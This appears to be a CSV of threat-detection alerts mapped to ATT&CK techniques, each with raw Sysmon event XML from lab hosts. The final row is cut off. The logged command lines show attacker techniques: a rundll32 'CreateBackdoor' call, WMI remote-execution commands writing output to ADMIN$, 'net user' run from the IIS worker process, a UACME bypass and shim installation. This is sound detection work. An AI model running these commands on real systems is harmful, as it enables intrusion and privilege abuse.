Process,1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,OpenURL ms-browser:// )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 340 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:46:43.232 + 747F3D96-28B3-5E1E-0000-00101DF17B00 + 3412 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 url.dll,OpenURL ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-28B3-5E1E-0000-002057EB7B00 + 0x7beb57 + 0 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-28B3-5E1E-0000-0010CAEC7B00 + 1632 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.513362,2020-03-21T09:00:25.513362+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243562 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.488 + 747F3D96-9F69-5E75-0000-00105B9A2000 + 2028 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Detect IIS/Exchange Exploitation,1558661633.122501,2019-05-24T05:33:53.122501+04:00,,Threat,Critical,IIS run command with user (IIS APPPOOL\DefaultAppPool) and process name (C:\Windows\System32\cmd.exe) and commandline ( "c:\windows\system32\cmd.exe" /c net user ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1044 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-24 01:33:53.112 + 365ABB72-4A01-5CE7-0000-0010EE9DAC00 + 2404 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "c:\windows\system32\cmd.exe" /c net user + c:\windows\system32\inetsrv\ + IIS APPPOOL\DefaultAppPool + 365ABB72-45C7-5CE7-0000-002092F99C00 + 0x9cf992 + 0 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-49D6-5CE7-0000-001020A7A700 + 2580 + C:\Windows\System32\inetsrv\w3wp.exe + c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v2.0" -l "webengine4.dll" -a \\.\pipe\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h "C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766825.513362,2020-03-21T09:00:25.513362+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243562 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.488 + 747F3D96-9F69-5E75-0000-00105B9A2000 + 2028 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1556656371.324839,2019-05-01T00:32:51.324839+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9827 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:32:51.246 + 365ABB72-B0F3-5CC8-0000-0010B1361D00 + 2504 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 + C:\ + IEWIN7\IEUser + 365ABB72-B0F2-5CC8-0000-00203D311D00 + 0x1d313d + 0 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-B0C0-5CC8-0000-001017C31C00 + 836 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558661633.122501,2019-05-24T05:33:53.122501+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\cmd.exe ) through command line ( "c:\windows\system32\cmd.exe" /c net user ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1044 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-24 01:33:53.112 + 365ABB72-4A01-5CE7-0000-0010EE9DAC00 + 2404 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "c:\windows\system32\cmd.exe" /c net user + c:\windows\system32\inetsrv\ + IIS APPPOOL\DefaultAppPool + 365ABB72-45C7-5CE7-0000-002092F99C00 + 0x9cf992 + 0 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-49D6-5CE7-0000-001020A7A700 + 2580 + C:\Windows\System32\inetsrv\w3wp.exe + c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v2.0" -l "webengine4.dll" -a \\.\pipe\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h "C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1556656371.324839,2019-05-01T00:32:51.324839+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9827 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:32:51.246 + 365ABB72-B0F3-5CC8-0000-0010B1361D00 + 2504 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 + C:\ + IEWIN7\IEUser + 365ABB72-B0F2-5CC8-0000-00203D311D00 + 0x1d313d + 0 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-B0C0-5CC8-0000-001017C31C00 + 836 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1556656371.324839,2019-05-01T00:32:51.324839+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9827 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:32:51.246 + 365ABB72-B0F3-5CC8-0000-0010B1361D00 + 2504 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 + C:\ + IEWIN7\IEUser + 365ABB72-B0F2-5CC8-0000-00203D311D00 + 0x1d313d + 0 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-B0C0-5CC8-0000-001017C31C00 + 836 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564911238.127145,2019-08-04T13:33:58.127145+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\windows\system32\cmd.exe "C:\Windows\system32\osk.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5764 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-04 09:33:57.876 + 747F3D96-A685-5D46-0000-00100D41D703 + 3296 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + C:\windows\system32\cmd.exe "C:\Windows\system32\osk.exe" + C:\Users\IEUser\Desktop\ + MSEDGEWIN10\IEUser + 747F3D96-56A3-5D45-0000-0020FBD31800 + 0x18d3fb + 1 + Medium + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-A685-5D46-0000-00109B2AD703 + 3916 + C:\Users\IEUser\Desktop\UACME.exe + UACME.exe 55 c:\Windows\SysWOW64\notepad.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1618950781.944467,2021-04-21T00:33:01.944467+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10 and IP ( 127.0.0.1 ) to hostname ( MSEDGEWIN10 ) , IP ( 127.0.0.1 ) and port ( 445 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 578500 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Suspicious NetCon + 2021-04-20 20:33:59.834 + 747F3D96-04C3-607F-0000-0010F13B1E00 + 2532 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + tcp + true + false + 127.0.0.1 + MSEDGEWIN10 + 49925 + + false + 127.0.0.1 + MSEDGEWIN10 + 445 + microsoft-ds + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1556656371.246714,2019-05-01T00:32:51.246714+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9826 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:32:51.168 + 365ABB72-B0F3-5CC8-0000-00105F321D00 + 3840 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 + C:\ + IEWIN7\IEUser + 365ABB72-B0F2-5CC8-0000-00203D311D00 + 0x1d313d + 0 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-B0C0-5CC8-0000-001017C31C00 + 836 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1556656371.246714,2019-05-01T00:32:51.246714+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9826 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:32:51.168 + 365ABB72-B0F3-5CC8-0000-00105F321D00 + 3840 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 + C:\ + IEWIN7\IEUser + 365ABB72-B0F2-5CC8-0000-00203D311D00 + 0x1d313d + 0 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-B0C0-5CC8-0000-001017C31C00 + 836 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1556656371.246714,2019-05-01T00:32:51.246714+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9826 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:32:51.168 + 365ABB72-B0F3-5CC8-0000-00105F321D00 + 3840 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 + C:\ + IEWIN7\IEUser + 365ABB72-B0F2-5CC8-0000-00203D311D00 + 0x1d313d + 0 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-B0C0-5CC8-0000-001017C31C00 + 836 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1138] Application Shimming - process,1553028584.802196,2019-03-20T00:49:44.802196+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966408 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 20:49:44.712 + 365ABB72-55E8-5C91-0000-001037DF0700 + 4052 + C:\Windows\System32\sdbinst.exe + 6.0.7600.16385 (win7_rtm.090713-1255) + Application Compatibility Database Installer + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\sdbinst.exe" -q "C:\Windows\AppPatch\Test.SDB " + C:\Windows\System32\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F + 365ABB72-551C-5C91-0000-001030590500 + 2704 + C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe + "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe" + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +Command run remotely Using WMI,1607599134.733908,2020-12-10T15:18:54.733908+04:00,,Threat,Critical,User (NT AUTHORITY\LOCAL SERVICE) run command through WMI with process (C:\Windows\System32\wbem\WmiPrvSE.exe) and commandline ( C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 549600 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-12-10 11:18:54.576 + 747F3D96-041E-5FD2-0000-001024DF3B00 + 5580 + C:\Windows\System32\wbem\WmiPrvSE.exe + 10.0.17763.1 (WinBuild.160101.0800) + WMI Provider Host + Microsoft® Windows® Operating System + Microsoft Corporation + Wmiprvse.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + C:\Windows\system32\ + NT AUTHORITY\LOCAL SERVICE + 747F3D96-7E79-5FD2-0000-0020E5030000 + 0x3e5 + 0 + System + SHA1=67C25C8F28B5FA7F5BAA85BF1D2726AED48E9CF0,MD5=06C66FF5CCDC2D22344A3EB761A4D38A,SHA256=B5C78BEF3883E3099F7EF844DA1446DB29107E5C0223B97F29E7FAFAB5527F15,IMPHASH=CFECEDC01015A4FD1BAACAC9E592D88B + 00000000-0000-0000-0000-000000000000 + 832 + ? + ? + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1618950781.944115,2021-04-21T00:33:01.944115+04:00,,Threat,Low,Found User (MSEDGEWIN10\user03) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\System32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 578499 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2021-04-20 20:33:00.318 + 747F3D96-3A7C-607F-0000-001058067700 + 2740 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + C:\Windows\System32\cmd.exe + C:\Windows\system32\ + MSEDGEWIN10\user03 + 747F3D96-3A7C-607F-0000-002075057700 + 0x770575 + 1 + Medium + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-3A77-607F-0000-00105DD17600 + 7280 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1579034691.122589,2020-01-15T00:44:51.122589+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "cmd.exe" /c notepad.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 337 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:44:50.978 + 747F3D96-2842-5E1E-0000-0010745E7A00 + 1568 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "cmd.exe" /c notepad.exe + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-2842-5E1E-0000-0020FF3A7A00 + 0x7a3aff + 0 + High + SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-2842-5E1E-0000-00100C417A00 + 4180 + C:\Windows\System32\rundll32.exe + rundll32 url.dll,FileProtocolHandler ms-browser:// + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1556656513.168589,2019-05-01T00:35:13.168589+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9833 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:35:12.340 + 365ABB72-B180-5CC8-0000-00102BB71E00 + 1504 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 + C:\windows\system32\ + IEWIN7\IEUser + 365ABB72-B17F-5CC8-0000-0020C6A31E00 + 0x1ea3c6 + 0 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-B17F-5CC8-0000-001082A51E00 + 3572 + C:\Windows\System32\mmc.exe + C:\Windows\system32\mmc.exe -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 url.dll,FileProtocolHandler ms-browser://)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 336 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:44:50.348 + 747F3D96-2842-5E1E-0000-00100C417A00 + 4180 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 url.dll,FileProtocolHandler ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-2842-5E1E-0000-0020FF3A7A00 + 0x7a3aff + 0 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-2842-5E1E-0000-0010903C7A00 + 1628 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,FileProtocolHandler ms-browser:// )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 336 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:44:50.348 + 747F3D96-2842-5E1E-0000-00100C417A00 + 4180 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 url.dll,FileProtocolHandler ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-2842-5E1E-0000-0020FF3A7A00 + 0x7a3aff + 0 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-2842-5E1E-0000-0010903C7A00 + 1628 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1579034691.01611,2020-01-15T00:44:51.016110+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,FileProtocolHandler ms-browser:// )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 336 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:44:50.348 + 747F3D96-2842-5E1E-0000-00100C417A00 + 4180 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 url.dll,FileProtocolHandler ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-2842-5E1E-0000-0020FF3A7A00 + 0x7a3aff + 0 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-2842-5E1E-0000-0010903C7A00 + 1628 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436040.330766,2019-07-30T01:34:00.330766+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( 